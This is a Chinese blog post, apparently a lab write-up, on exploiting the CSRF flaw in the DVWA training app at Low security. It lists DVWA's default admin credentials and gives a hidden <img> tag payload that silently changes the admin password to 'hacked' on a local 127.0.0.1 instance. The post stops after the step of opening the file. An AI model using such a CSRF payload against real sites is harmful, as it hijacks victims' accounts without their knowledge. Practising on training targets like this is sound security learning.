DVWA CSRF 漏洞实践报告

1. 漏洞简介

CSRF(跨站请求伪造)是一种攻击,使得攻击者能够以受害者的身份执行非预期的操作。在靶场DVWA中,我将尝试通过CSRF漏洞更改管理员密码。

2. 实验环境

  • DVWA版本:DVWA-old
  • 浏览器:火狐
  • 默认管理员账户:admin / password

3. 漏洞利用过程

3.1 Low 级别

步骤:

1. 登录DVWA,将安全级别设置为Low

2. 访问CSRF页面,观察更改密码的表单

3. 先尝试在页面修改初始密码为“123”,点击“Change(更改)”后,就出现下面的链接。

4. 复制上面的 url,用Notepad+创建一个包含以下内容的HTML文件,命名为“csrf_attack.html”

<img src="http://127.0.0.1/DVWA-old/vulnerabilities/csrf/?
password_new=hacked&password_conf=hacked&Change=Change" style="display:none;" />

5. 在管理员已登录的状态下访问这个HTML文件 (注:一定要在同一个浏览器中打开)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Lixin Zhang

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值